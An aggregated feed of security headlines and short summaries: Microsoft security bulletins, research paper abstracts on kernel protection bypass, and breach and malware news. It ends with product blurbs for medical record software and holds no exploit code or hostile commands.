==> MS13-044 - Important : Vulnerability in Microsoft Visio Could Allow Information Disclosure (2834692) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-037 - Critical : Cumulative Security Update for Internet Explorer (2829530) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for May 2013 - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-081 - Critical : Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2758857) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-045 - Important : Vulnerability in Windows Essentials Could Allow Information Disclosure (2813707) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2846338): Vulnerability in Microsoft Malware Protection Engine Could Allow Remote Code Execution - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2820197): Update Rollup for ActiveX Kill Bits - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-046 - Important : Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege (2840221) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-043 - Important : Vulnerability in Microsoft Word Could Allow Remote Code Execution (2830399) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-042 - Important : Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution (2830397) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-041 - Important : Vulnerability in Lync Could Allow Remote Code Execution (2834695) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-039 - Important : Vulnerability in HTTP.sys Could Allow Denial of Service (2829254) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2847140): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-009 - Critical : Cumulative Security Update for Internet Explorer (2792100) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 12.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 4.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-036 - Important : Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege (2829996) - Version: 3.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-031 - Important : Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2813170) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-028 - Critical : Cumulative Security Update for Internet Explorer (2817183) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for April 2013 - Version: 3.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-034 - Important : Vulnerability in Microsoft Antimalware Client Could Allow Elevation of Privilege (2823482) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-029 - Critical : Vulnerability in Remote Desktop Client Could Allow Remote Code Execution (2828223) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-035 - Important : Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege (2821818) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-033 - Important : Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege (2820917) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-032 - Important : Vulnerability in Active Directory Could Lead to Denial of Service (2830914) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-030 - Important : Vulnerability in SharePoint Could Allow Information Disclosure (2827663) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-022 - Critical : Vulnerability in Silverlight Could Allow Remote Code Execution (2814124) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-007 - Important : Vulnerability in Open Data Protocol Could Allow Denial of Service (2769327) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-027 - Important : Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege (2807986) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2819682): Security Updates for Microsoft Windows Store Applications - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-026 - Important : Vulnerability in Microsoft Office for Mac Could Allow Information Disclosure (2813682) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-023 - Critical : Vulnerability in Microsoft Visio Viewer 2010 Could Allow Remote Code Execution (2801261) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for March 2013 - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-025 - Important : Vulnerability in Microsoft OneNote Could Allow Information Disclosure (2816264) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-024 - Critical : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2780176) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-021 - Critical : Cumulative Security Update for Internet Explorer (2809289) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-003 - Important : Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege (2748552) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for January 2013 - Version: 4.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-034 - Critical : Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578) - Version: 1.6

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-020 - Critical : Vulnerability in OLE Automation Could Allow Remote Code Execution (2802968) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

http://www.offensivecomputing.net/?q=node/feed Dear like-mindeds, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community. Especially those dealing with malware analysis and accordingly investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is a so to say unintentionally implication of Microsoft's WOW64 technology and the according redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as ``PatchGuard''), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public (``PatchGuard 3''). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> REVIEW: “Consent of the Networked”, Rebecca MacKinnon

http://blogs.securiteam.com/index.php/feed/ BKCNSNTW.RVW 20121205 “Consent of the Networked”, Rebecca MacKinnon, 2012, 978-0-465-02442-1, U$26.99/C$30.00 %A Rebecca MacKinnon %C 387 Park Ave. South, New York, NY 10016-8810 %D 2012 %G 978-0-465-02442-1 0-465-02442-1 %I Basic Books %O U$26.99/C$30.00 special.markets@perseusbooks.com %O http://www.amazon.com/exec/obidos/ASIN/0465024421/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0465024421/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0465024421/robsladesin03-20 %O Audience n Tech 1 Writing 1 (see revfaq.htm for explanation) %P 294 p. %T “Consent [...]

==> Nopcon 2013 is here

http://blogs.securiteam.com/index.php/feed/ Douglas Adams is still right: No language has the phrase As pretty as an airport. But in my humble opinion, airports have come a long way in the last 10 years. Or maybe my expectations have become so low, I can’t be disappointed. Either way, it seems to me going through an airport isn’t as [...]

==> Risk analysis, traffic analysis, and unusual factors

http://blogs.securiteam.com/index.php/feed/ Canadian terrorists strike again: apparently we are responsible for taking down a major piece of transportation infrastructure, vis, the I-5 bridge over the Skagit river at Mount Vernon. A friend in Seattle assures me that, while he is disappointed in us, he holds no grudges, and is willing to warn us if he hears of [...]

==> REVIEW: “Cloud Crash”, Phil Edwards

http://blogs.securiteam.com/index.php/feed/ BKCLDCRS.RVW 20101009 “Cloud Crash”, Phil Edwards, 2011, 978-1466408425, U$9.99 %A Phil Edwards PhilEdwardsInc.com philipjedwards@gmail.com %C Seattle, WA %D 2011 %G 978-1466408425 1466408421 %I CreateSpace Independent Publishing Platform/Amazon %O U$9.99 %O http://www.amazon.com/exec/obidos/ASIN/1466408421/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/1466408421/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/1466408421/robsladesin03-20 %O Audience n Tech 2 Writing 1 (see revfaq.htm for explanation) %P 386 p. %T “Cloud Crash” To a background of [...]

==> Fake security can hurt you …

http://blogs.securiteam.com/index.php/feed/ “Fraudster James McCormick has been jailed for 10 years for selling fake bomb detectors. … One invoice showed sales of 38m over three years to Iraq, the judge said.” http://www.bbc.co.uk/news/uk-22380368 Closer to our technical field, we know about the pure fraud of fake AV, of course. And there are plenty of companies out there selling [...]

==> Why BC holds the record for “World’s Weirdest Politicians”

http://blogs.securiteam.com/index.php/feed/ Whenever political pundits get together, they all start the competition for “our politicians are more corrupt/venal/just plain weird than yours.” Whenever anyone from BC enters the fray, everyone else concedes. Herewith our latest saga. The ruling “Today’s BC Liberal Party” is finding itself polling behind the NDP. (Do not let the word “liberal” in the [...]

==> REVIEW: “World War Hack”, Ethan Bull/Tsubasa Yozora

http://blogs.securiteam.com/index.php/feed/ BKWWHACK.RVW 20121009 “World War Hack”, Ethan Bull/Tsubasa Yozora, 2012, 978-0-9833670-8-6 %A Ethan Bull %A Tsubasa Yozora %C 9400 N. MacArthur Blvd., Suite 124-215, Irving, TX 75063 %D 2012 %E Gwendolyn Borgen %G 978-0-9833670-8-6 0-9833670-8-6 %I Viper Entertainment Inc./Viper Comics %O U$7.95 wyatt@worldwarhack.com www.worldwarhack.com %O http://www.amazon.com/exec/obidos/ASIN/0983367086/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0983367086/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0983367086/robsladesin03-20 %O Audience n- Tech 1 Writing 1 [...]

==> M-ETH: Man in the middle – Ethernet

http://blog.wintercore.com/?feed=rss2 Over a year ago I presented at LaCon'09 a custom PCI NIC which allows to perform Man in the middle of the whole network traffic flowing through the device. The idea behind this PCI Card is onceit isplugged into a computer the whole traffic can be inspected, analyzed and, of course, modified when required in [...]

==> Vulnerability Engineering

http://blog.wintercore.com/?feed=rss2 In this article we are going to use some metrics from Software Engineering and apply them to the Vulnerability Research World. We are going to define a new term which will allow us get a probabilty showing how likely is an application to have a vulnerability during its lifetime and also will give an idea [...]

==> See Artica Demo Client and IceSphere in action

http://blog.wintercore.com/?feed=rss2 Download Video (24 mb) Do not hesitate to contact us if you need further information

==> Motorola Timbuktu’s Internet Locator Service real-time data exposed to public

http://blog.wintercore.com/?feed=rss2 We just want to make a public warning to those users of Motorola/Netopia Timbuktu Remote Control Software who are using the Internet Locator service. This service allows to locate any Timbuktu's user just by knowing the email. More than five months ago we notified Netopia's customer support (http://blog.wintercore.com/2008/04/26/things-that-shouldnt-be-there/), after discovering a hardcoded user/password pair within [...]

==> Toward a new generation of audio captchas

http://blog.wintercore.com/?feed=rss2 It seems the post "Breaking Gmail's audio Captcha" has been slashdotted so many interesting discussions have emerged as a result. It's worth noting that there is nothing specially exciting in the approach used to break the google audio captcha, merely a bunch of signal analysis and pattern recognition principles applied. Almost any Voice Recognition / [...]

==> Things that shouldn’t be there

http://blog.wintercore.com/?feed=rss2 Some days ago we released a security advisory for Realtek-curious note: according to secunia, it is the first advisory for that vendor- where a piece of code that was originally intented to be used by the engineers only, ends up being compiled in the release driver. Obviously, there is no reason to think about this [...]

==> Breaking Gmail’s Audio Captcha

http://blog.wintercore.com/?feed=rss2 A week ago I came across this interesting post at the Websense blog, anyway I guess everybody is already aware that a bot was spotted breaking Gmail's image captcha. According to the post, the success rate is about 20%, which from spammers point of view is really profitable and sure more than enough for its [...]

==> UK Is Sixth In The World As Cyber Crime Target, Cyber Security Is Not Marketed Enough

http://cyberinsecure.com/feed/ It has been suggested by UK ministers recently that there should be better awareness of theimportance of cyber security. Although conventionally, it is the more traditional generations that are wary of sharing their details in the new digital world, it is perhaps not such a bad thing to be more cautious. Jim Murphy, the Shadow [...]

==> Hijacked High-Ranked Sites Serve Malicious, Illegal Content, Blacklisted By Google

http://cyberinsecure.com/feed/ Researchers have found that Google Safe Browsing has blacklisted a number of legitimate sites after they’ve been hijacked and set up to serve malicious or illegal content. Many of them are ranked high, according to Alexa. Zscaler experts have scanned the first 1 million websites found in the Alexa top and found that 621 of [...]

==> Apple Plugs Java Hole After Flashback Trojan Creates 550,000 Strong Mac Botnet

http://cyberinsecure.com/feed/ Apple released a security update for OS X Java on Tuesday, plugging a security vulnerability exploited by the latest Flashback Trojan. The latest variant of the Mac-specific malware appeared on Monday and targeted a vulnerability in Java (CVE-2012-0507) which was patched on Windows machines more than six weeks ago. Apple’s new version of Java for [...]

==> Free Malware Scanning Service SiteInspector Launched By Comodo

http://cyberinsecure.com/feed/ Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist. Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these [...]

==> US Army CECOM Website Breached, 30 Record Sets With User IDs, Clear-text Passwords, Private Data Posted On Pastebin

http://cyberinsecure.com/feed/ Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM). A number of 30 record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords [...]

==> Scareware Makes Files And Folders Invisible, Demands Ransom For Repair Utility

http://cyberinsecure.com/feed/ Bitdefender experts came across a piece of scareware that makes victims believe that something may have happened to all the files and folders stored on their computers. The user is then requested to pay $80 (60 EUR) for a tool that allegedly addresses the problem. Scareware or ransomware is not uncommon, many security solutions providers [...]

==> US Security Firm Stratfor Hit By ‘Anonymous’, Clients Credit Cards And Passwords Stolen

http://cyberinsecure.com/feed/ The hacking group “Anonymous” on Sunday Christmas claimed it has stolen thousands of credit card numbers and personal information of clients of the U.S. based security think-tank Stratfor and pilfered funds it gave away as Christmas donations to charity. Anonymous said it stole information from organizations and individuals that were clients of Stratfor, including Apple [...]

==> Ultimate Bet Players Accounts Compromised, 3.5 Million Records Freely Available Online For Weeks Still In Google Cache

http://cyberinsecure.com/feed/ In a breach of security at Ultimate Bet, information from every players account had been publicly posted on the internet, revealing personal information of approximately 3.5 million poker players holding accounts at the nearly-dead poker site. A popular poker forum website posted a link to the account information via an anonymous posting, but removed the [...]

==> Restaurant Depot, Jetro Cash & Carry Processing System Compromised, Credit Cards Sold On Russian Blackmarket

http://cyberinsecure.com/feed/ If you used a credit card between the dates of Sept. 21 and Nov. 18th at national restaurant wholesalers Restaurant Depot or Jetro Cash & Carry, then you should probably know that Russian cyberthugs wearing leather blazers and gold chains and stinking of Armani Aqua di Gio are currently selling your information on the black [...]

==> InternationalCheckout.com Database Hacked, Customers Credit Cards Abused

http://cyberinsecure.com/feed/ International Checkout customers began receiving emails that alert them on the fact that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details. International Checkout was recently the victim of a system intruder who was able to access encrypted credit [...]

==> Software Offered By CNET Bundled With Trojans, Spread Through Download.com

http://cyberinsecure.com/feed/ One of the developers of a network exploration and security auditing tool called Nmap is accusing CNET of bundling free software with Trojans and shady toolbars, and serving them on their Download.com website. Gordon Lyon, also known as Fyodor claims he discovered that Nmap and other free applications such as VLC are downloaded with pieces [...]

==> Unpatched Yahoo! Messenger Flaw Allows Status Updates Remote Hijacking

http://cyberinsecure.com/feed/ Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user’s status message. Hijacked status updates are a handy way to persuade a victim’s contacts to click on a link and lead them to a dangerous website. Worse still, the bug in version 11.x of the Messenger client requires [...]

==> Adidas Websites Taken Down After Attack, Adidas.com, Reebok.com Affected

http://cyberinsecure.com/feed/ The popular sports equipment maker took down some of its websites after a security breach that targeted their network was discovered on November 3. The affected locations include adidas.com, reebok.com, miCoach.com, adidas-group.com and some local e-commerce shops. They were all taken down in order to protect the individuals that might visit them. Our preliminary investigation [...]

==> Private Canadian bleep’s Ministry Papers Dumped In Trash, Contain Names, Addresses, Birth Dates

http://cyberinsecure.com/feed/ The B.C. government is dealing with another privacy breach after confidential documents from the Ministry of bleep and Family Development were found dumped in a garbage bin. The documents were discovered dumped in a green dumpster behind a Victoria apartment building last week, and contain client names, addresses, birth dates and health card numbers. At [...]

==> Numerous Defense And Chemical Firms Targeted In Industrial Espionage Campaign

http://cyberinsecure.com/feed/ Dozens of companies in the defense and chemical industries have been targeted in an industrial espionage campaign that steals confidential data from computers infected with malware, researchers from Symantec said. At least 29 companies involved in the research, development, and manufacture of chemicals and an additional 19 firms in defense and other industries have been [...]

==> Phishing Campaign Fake Legitimate Apple Emails, Steals Victims ID And Password

http://cyberinsecure.com/feed/ A phishing campaign which involves the reputation of Apple has been seen invading inboxes. The rogue message perfectly replicates alerts received by customers when the company notifies them on changes of their accounts. A Trend Micro researcher came across a message that looked very much like the genuine message he had received not long ago [...]

==> osCommerce Compromised Sites Distribute ZeuS Spin-off Trojan, Millions Of Pages Infected

http://cyberinsecure.com/feed/ Security researchers warn that variants of a ZeuS spin-off trojan called Ice-IX are being distributed from osCommerce websites compromised during a recent mass injection attack. The attack targeting osCommerce installations vulnerable to a flaw that dates from November 2010 began at the end of July. The code injection campaign escalated quickly and the number of [...]

==> Data From 56 Law Enforcement Agencies Stolen By Antisec, 10GBs Of Emails From 300 Accounts Posted Online

http://cyberinsecure.com/feed/ Hackers associated with Anonymous’ Operation Antisec have leaked a massive cache of personal records, email messages and confidential documents belonging to law enforcement agencies. The data was obtained recently when the group hacked into a server housing 77 websites belonging to county sheriff offices and other local law enforcement organizations. The leak has been posted [...]

==> US Government Contractor ManTech Hacked, Confidential Documents Stolen And Posted Online

http://cyberinsecure.com/feed/ Anonymous has published around 400 MB of confidential documents involving ManTech, a large federal contractor which provides IT solutions to many government departments. The hacktivist collective announced plans to release the files yesterday and even posted some teaser samples to prove it means business. The full archive was eventually released in true Anonymous style, with [...]

==> U.S. Military Contractor Booz Allen Hamilton Hacked, Emails And Sensitive Data Exposed

http://cyberinsecure.com/feed/ Hackers affiliated with the Anonymous collective and its Antisec campaign have hacked into computer systems belonging to U.S. military contractor Booz Allen Hamilton and leaked sensitive data found inside. The hackers described the attack in the description of a torrent posted on ThePirateBay which also contains a list of 90,000 email addresses belonging to military [...]

==> Definitively Moved to Blogspot

http://evilcodecave.wordpress.com/feed/ Definitively Moved to Blogspot www.evilcodecave.blogspot.com

==> Fast Overview of SpyEye

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/02/fast-overview-of-spyeye.html

==> Rootkit Agent.adah Anatomy and Executables Carving via Cryptoanalytical Approach

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/01/rootkit-agentadah-anatomy-and.html

==> PHP/Spy.Bull Cryptanalysis of Encryption used and Threat Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/phpspybull-cryptanalysis-of-encryption.html

==> Siberia ExploitPack and PDF Exploit Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/siberia-exploitpack-and-pdf-exploit.html

==> DNAScan Malicious Network Activity Reverse Engineering

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/dnascan-malicious-network-activity.html

==> Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

==> PHPSpyScanBot Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/phpspyscanbot-analysis.html

==> [Crimeware] Researches Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/crimeware-researches-about-eleonore.html

==> [Crimeware] Researches and Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/

==> Behold, the world’s most sophisticated Android trojan

http://feeds.arstechnica.com/arstechnica/security?format=xml Obad.a exploits undocumented Android bugs and offers advanced features.

==> Under draft bill, EU wants to raise jail time for hackers, botnet operators

http://feeds.arstechnica.com/arstechnica/security?format=xml Minimum sentences of 3 years for botnets, 5 years for damaging "infrastructure."

==> After burglaries, mystery car unlocking device has police stumped

http://feeds.arstechnica.com/arstechnica/security?format=xml Southern California cops can't figure out how keyless entry device works.

==> Dutch public transportation may be hackable with an Android smartphone

http://feeds.arstechnica.com/arstechnica/security?format=xml Two Android apps may be able to crack the RFID chip inside fare smartcards.

==> More than 360,000 Apache websites imperiled by critical Plesk vulnerability (Updated)

http://feeds.arstechnica.com/arstechnica/security?format=xml Publicly available attack code exploits remote-code bug in Plesk admin panel.

==> Mac OS X update protects users against CRIME attacks

http://feeds.arstechnica.com/arstechnica/security?format=xml Attacks allow hackers to hijack some browsing sessions protected by HTTPS.

==> Espionage malware infects raft of governments, industries around the world

http://feeds.arstechnica.com/arstechnica/security?format=xml "NetTraveler" stole data on space exploration, nanotechnology, energy, and more.

==> Password crackers go green by immersing their GPUs in mineral oil

http://feeds.arstechnica.com/arstechnica/security?format=xml Dunking a powered-on PC in cooling liquid may seem crazy, but not for KoreLogic.

==> The secret to online safety: Lies, random characters, and a password manager

http://feeds.arstechnica.com/arstechnica/security?format=xml Or, how to go from "123456" to "XBapfSDS3EJz4r42vDUt."

==> Ars readers react: cracking passwords with 90 percent success

http://feeds.arstechnica.com/arstechnica/security?format=xml The Ars community gawks at Google's Go, wonders about the fate of wolves.

==> Someday you may ditch your two-factor authenticator for an electronic tattoo

http://feeds.arstechnica.com/arstechnica/security?format=xml Dongles aren't cool. Know what's cool? Tattoos and password pill addictions.

==> Yahoo Mail reportedly loses key customer following mass hack attack

http://feeds.arstechnica.com/arstechnica/security?format=xml Memo to Marissa Mayer: Security is key to your plan to revive Yahoo.

==> iCloud users take note: Apple two-step protection won’t protect your data

http://feeds.arstechnica.com/arstechnica/security?format=xml Limitations could leave users open to the type of hack that hit Wired's Mat Honan.

==> Drupal.org resets login credentials after hack exposes password data

http://feeds.arstechnica.com/arstechnica/security?format=xml Passwords for almost 1 million accounts affected after malicious files are found.

==> Critical Ruby on Rails bug exploited in wild, hacked servers join botnet

http://feeds.arstechnica.com/arstechnica/security?format=xml Attackers' success shows many servers still aren't patched. Is yours?

==> Anatomy of a hack: How crackers ransack passwords like “qeadzcwrsfxv1331”

http://feeds.arstechnica.com/arstechnica/security?format=xml For Ars, three crackers have at 16,000+ hashed passcodeswith 90 percent success.

==> Google builds bigger crypto keys to make site forgeries harder

http://feeds.arstechnica.com/arstechnica/security?format=xml No one has cracked a 1024-bit key yet, but Google isn't taking any chances.

==> Twitter launches two-factor authentication, too late to save The Onion

http://feeds.arstechnica.com/arstechnica/security?format=xml Login authentication aims to stem flood of accounts exposed by phishing attacks.

==> Power company targeted by 10,000 cyberattacks per month

http://feeds.arstechnica.com/arstechnica/security?format=xml Electric grid is under daily assault, Congressional report finds.

==> Reporters use Google, find breach, get branded as “hackers”

http://feeds.arstechnica.com/arstechnica/security?format=xml Scripps reporters uncover mishandling of customer data; companies threaten to sue.

==> Chinese hackers who breached Google reportedly targeted classified data

http://feeds.arstechnica.com/arstechnica/security?format=xml Breach exposed thousands of surveillance orders for suspected spies, terrorists.

==> Chinese army hackers return from vacation, renew attacks on US

http://feeds.arstechnica.com/arstechnica/security?format=xml Being outed, public "shaming" by White House only yielded pause in hacks.

==> Financial Times’ Twitter, tech blog hijacked by the Syrian Electronic Army

http://feeds.arstechnica.com/arstechnica/security?format=xml FT is part of a growing list of media companies duped by the Pro-Assad crew.

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there’s information available to help. The Best Web Hosts is great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practices server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditabs Intelligent Medical Software (IMS) combine features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

http://feeds.feedburner.com/Docucrunch?format=xml Noteworthys NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

